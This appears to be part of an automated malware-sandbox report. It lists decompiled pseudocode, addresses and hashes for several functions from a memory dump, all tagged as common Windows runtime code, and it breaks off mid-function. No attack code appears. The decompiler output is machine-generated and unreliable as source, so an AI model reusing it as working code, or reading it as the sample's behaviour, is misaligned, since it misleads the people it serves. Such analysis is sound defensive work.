Opcode ID: 38f103c2bff4cf5bfa22e22a4d9bcacc4e9fd2aea73d2069e7a5b47037c3dbb6
Instruction ID: cbf3fb42728264ba82f79ef1f0600cf8275dd03b68f84351903c096931ad5279
Opcode Fuzzy Hash: 38f103c2bff4cf5bfa22e22a4d9bcacc4e9fd2aea73d2069e7a5b47037c3dbb6
Instruction Fuzzy Hash: 3C41E5B1F083119BCB25DB69C994B7BF799AF84620F08425DF856CF390DB34D801D695

Uniqueness

Uniqueness Score: -1.00%

Function 0363DBE9, Relevance: .1, Instructions: 149
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0363DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E0361CC50(E03614510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E03637D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E036E8ED6(_t102, _t98);
						}
						_t76 = _v44;
						E03632280(_t58, _v44);
						E0363DD82(_v44, _t102, _t98);
						E0363B944(_t102, _v5);
						return E0362FFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x3708628; // 0x0
							_v28 = _t67;
							_t68 =  *0x370862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x3708628; // 0x0
						_t105 = _v28;
						_t80 =  *0x370862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x36dfb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}

0x0363dbe9
0x0363dbf2
0x0363dbf7
0x0363dbf9
0x0363dbfc
0x0363dc00
0x0363dc03
0x0363dc14
0x0363dd54
0x0363dd54
0x0363dd54
0x0363dc18
0x0363dc1d
0x0363dc1d
0x0363dc32
0x0363dc3b
0x0363dc3e
0x0363dc46
0x0363dd5b
0x0363dd62
0x0363dd64
0x0363dd67
0x0363dd69
0x0363dd6b
0x0363dd6e
0x0363dd70
0x0363dd73
0x0363dd73
0x00000000
0x0363dc4c
0x0363dc4e
0x03683ae3
0x03683ae8
0x03683aea
0x0363dce7
0x0363dce9
0x0363dcec
0x0363dcee
0x0363dcf0
0x0363dcf3
0x0363dcf5
0x03683af2
0x03683af5
0x03683af5
0x0363dd06
0x0363dd08
0x0363dd0b
0x0363dd12
0x03683b08
0x0363dd18
0x0363dd18
0x0363dd18
0x0363dd20
0x0363dd23
0x03683b16
0x03683b16
0x0363dd29
0x0363dd2d
0x0363dd36
0x0363dd40
0x0363dd51
0x0363dd51
0x0363dc54
0x0363dc59
0x0363dc59
0x0363dc5e
0x0363dc5e
0x0363dc63
0x0363dc66
0x0363dc6b
0x0363dc78
0x0363dc7b
0x0363dc81
0x0363dc81
0x0363dc83
0x0363dc89
0x00000000
0x00000000
0x0363dd7b
0x0363dd7b
0x0363dc8f
0x0363dc8f
0x0363dc92
0x0363dc99
0x0363dc9f
0x0363dca5
0x0363dcaa
0x0363dcaa
0x0363dcb3
0x0363dcb8
0x0363dcbb
0x0363dcc1
0x0363dccf
0x0363dcd2
0x0363dcd5
0x0363dcd7
0x0363dcda
0x0363dcdc
0x0363dcdc
0x0363dce2
0x0363dce4
0x00000000
0x0363dce4

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4ca2f647e158fc657cd00ed76f7abd844baff33ecab503e364c582083499564
Instruction ID: 50027b424a8875ab7cfd7bf893f096f22a999b13d6d7f50f7266cf29e79e5a35
Opcode Fuzzy Hash: a4ca2f647e158fc657cd00ed76f7abd844baff33ecab503e364c582083499564
Instruction Fuzzy Hash: 3D5102B5A00605DFCB14DF68C580AAEFBF5FF4A310F24819AD555AB340DB70AD44CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0362EF40, Relevance: .1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0362EF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E03619080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x77dfc21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E03612D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}

0x0362ef4b
0x0362ef4d
0x0362ef57
0x0362f0bd
0x0362f0c2
0x0362f0d2
0x0362f0d2
0x0362f0c2
0x0362ef5d
0x0362ef5f
0x0362ef67
0x0362ef6a
0x0362ef6d
0x0362ef74
0x0362ef7f
0x0362ef82
0x0362ef82
0x0362ef86
0x0362ef88
0x0362ef8c
0x0362ef8f
0x0362ef8f
0x0362ef8f
0x00000000
0x0362ef91
0x0362ef93
0x0362efc4
0x0362efc4
0x0362efc4
0x0362efca
0x0362efd0
0x0362f0a6
0x00000000
0x00000000
0x0362f0af
0x0367bb06
0x0367bb0a
0x0362f0b5
0x0362f0b5
0x0362f0b5
0x0362f0b5
0x00000000
0x0362efd6
0x0362efd9
0x0362f0de
0x0362f0e2
0x0362efdf
0x0362efdf
0x0362efdf
0x0362efe5
0x0367bafc
0x0367bafc
0x0362efe5
0x0362efeb
0x0362efed
0x0362f00f
0x0362f011
0x0362f01a
0x0362f01d
0x0362f021
0x0362f028
0x0362f029
0x0362f029
0x0362f02c
0x00000000
0x0362f02c
0x0362eff3
0x0362eff9
0x0362f0ea
0x0362f0ed
0x0362f0ef
0x00000000
0x0362f0ef
0x0362f003
0x0367bb12
0x0362f045
0x0362f049
0x0362f051
0x0362f09e
0x0362f0a0
0x0362f0a0
0x0362f09e
0x0362f053
0x0362f064
0x0362f064
0x0362f06b
0x0367bb1a
0x0367bb1a
0x0362f071
0x0362f071
0x0362f07d
0x0362f082
0x0362f08f
0x0362f08f
0x0362f009
0x0362f00d
0x00000000
0x0362f00d
0x0362efd0
0x0362ef97
0x0362efa5
0x0362efaa
0x00000000
0x0362efac
0x0362efac
0x0362efac
0x00000000
0x0362efb2
0x0362f036
0x0362f03a
0x0362f040
0x0362f090
0x00000000
0x0362f092
0x0362f042
0x00000000
0x0362f042
0x0362efb7
0x0362efb9
0x0362efbc
0x0362efb0
0x0362efb0
0x00000000
0x0362efbe
0x0362efbe
0x0362efc1
0x00000000
0x0362efc1
0x0362efbc
0x0362efaa
0x0362ef91

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction ID: f983dca45057c8223607aa8c3092596022fdbed47a63f9990243f1d36ebeb629
Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction Fuzzy Hash: 3151F330E04A69DFDB14CB69C2A47AEFFF1AF05314F1E81A8C4455B381C376A989CB51

Uniqueness

Uniqueness Score: -1.00%

Function 036E740D, Relevance: .1, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E036E740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E0366D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E0365F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L03634620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L03634620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E0365F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L03634620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}

0x036e740d
0x036e740d
0x036e7412
0x036e7413
0x036e7416
0x036e7418
0x036e741c
0x036e741f
0x036e7422
0x036e7422
0x036e7428
0x036e742a
0x036e742a
0x036e7451
0x036e7432
0x036e744f
0x036e744f
0x00000000
0x036e7434
0x036e7438
0x036e7443
0x036e7517
0x036e7517
0x036e751a
0x036e7535
0x036e7520
0x036e7527
0x036e752c
0x036e7531
0x036e7533
0x00000000
0x036e7533
0x00000000
0x036e7531
0x036e754b
0x036e754f
0x036e755c
0x036e755c
0x036e755f
0x036e7560
0x036e7561
0x036e7562
0x036e7563
0x036e7568
0x036e756a
0x036e756c
0x036e756d
0x036e756d
0x036e756f
0x036e7572
0x036e7574
0x036e7577
0x036e757c
0x036e757f
0x00000000
0x036e7551
0x036e7551
0x036e7551
0x036e7553
0x036e7553
0x036e7449
0x036e7449
0x036e744c
0x036e744c
0x00000000
0x036e744c
0x036e7443
0x036e750e
0x036e7514
0x036e7514
0x036e7455
0x036e7469
0x036e746d
0x00000000
0x036e7473
0x036e7473
0x036e7476
0x036e7480
0x036e7484
0x036e748e
0x036e7493
0x036e7493
0x036e7496
0x036e7499
0x036e74a1
0x036e74b1
0x036e74b5
0x00000000
0x036e74bb
0x036e74c1
0x036e74c1
0x036e74c4
0x036e74c5
0x036e74c6
0x036e74c7
0x036e74c8
0x036e74cd
0x00000000
0x036e74d3
0x036e74d3
0x036e74d6
0x036e74d8
0x036e74db
0x036e74dd
0x036e74e0
0x036e74e7
0x036e74ee
0x036e74ee
0x036e74f4
0x036e74f9
0x00000000
0x036e74fb
0x036e74fb
0x036e74fd
0x036e7500
0x036e7503
0x036e7505
0x036e7505
0x036e74f9
0x00000000
0x036e74cd
0x036e74b5
0x00000000

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction ID: fc2ef4dd0d645e51a97acdd884610100b33cfec84a26abc39996ce66e94f8318
Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction Fuzzy Hash: E6518D71601606EFDB15CF54C980A56FBB9FF45304F18C0BAE9089F211EB71EA4ACBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03642990, Relevance: .1, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E03642990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x36eff00);
				E0366D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x35f1664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E0365E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x35f1668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E036951BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x35f166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E03642AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E03626600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E03642C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E0362EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E03642AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E03642C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E03642ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E0366D0D1(_t62);
				goto L28;
			}

0x03642990
0x03642992
0x03642997
0x036429a3
0x036429a6
0x036429ab
0x036429ad
0x036429b2
0x03685c80
0x036429b8
0x036429b8
0x036429bb
0x036429c0
0x036429c5
0x036429c6
0x036429c6
0x036429cb
0x00000000
0x00000000
0x036429cd
0x036429d0
0x036429d9
0x036429db
0x036429dd
0x03642a7f
0x03642a84
0x03642a87
0x03642a89
0x03685ca1
0x03685ca3
0x00000000
0x03642a8f
0x03642a8f
0x00000000
0x03642a8f
0x00000000
0x036429e3
0x036429e3
0x036429e3
0x00000000
0x036429e3
0x036429dd
0x00000000
0x036429db
0x036429e6
0x036429e9
0x036429eb
0x036429ed
0x036429f3
0x036429f5
0x036429f8
0x036429fa
0x03642a97
0x03642a9a
0x03642a9d
0x03642add
0x00000000
0x03642a9f
0x03642aa2
0x03642aa5
0x03642aa8
0x03642aab
0x03685cab
0x03685caf
0x03685cc5
0x03685cda
0x03685cdc
0x03685cdf
0x03685ce5
0x00000000
0x03685ceb
0x03685ced
0x03685cee
0x00000000
0x03685cee
0x03685cb1
0x03685cb4
0x03685cb9
0x03685cbb
0x00000000
0x03685cbd
0x03685cbd
0x00000000
0x03685cbd
0x03685cbb
0x03642ab1
0x03642ab1
0x03642ac4
0x03642ac6
0x03642ac6
0x00000000
0x03642ac6
0x03642aab
0x00000000
0x03642a00
0x03642a09
0x03642a0e
0x03642a21
0x03642a24
0x03642a35
0x03642a3a
0x03642a3d
0x03642a42
0x03642a59
0x03642a59
0x03642a5c
0x03642a5f
0x03642a5f
0x036429fa
0x036429f3
0x03642a64
0x03642a64
0x03642a6b
0x03642a6b
0x03642a6d
0x03642a72
0x00000000

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 511c58e656736faa83ac23467d062345231d415ca66e865c53505297e46d32eb
Instruction ID: 871c5c94b0ad44ad73cc8d46513d39502ddde2b5b0b1289eb50583eaaec96f96
Opcode Fuzzy Hash: 511c58e656736faa83ac23467d062345231d415ca66e865c53505297e46d32eb
Instruction Fuzzy Hash: A4514371E00219DFCF25DF55C990A9EBBB5BB48310F288559FD05AB360C3718992CF90

Uniqueness

Uniqueness Score: -1.00%

Function 03644BAD, Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E03644BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x370d360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E0361CC50(_t86);
					L11:
					return E0365B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x3708504
				E03632280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E0365FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
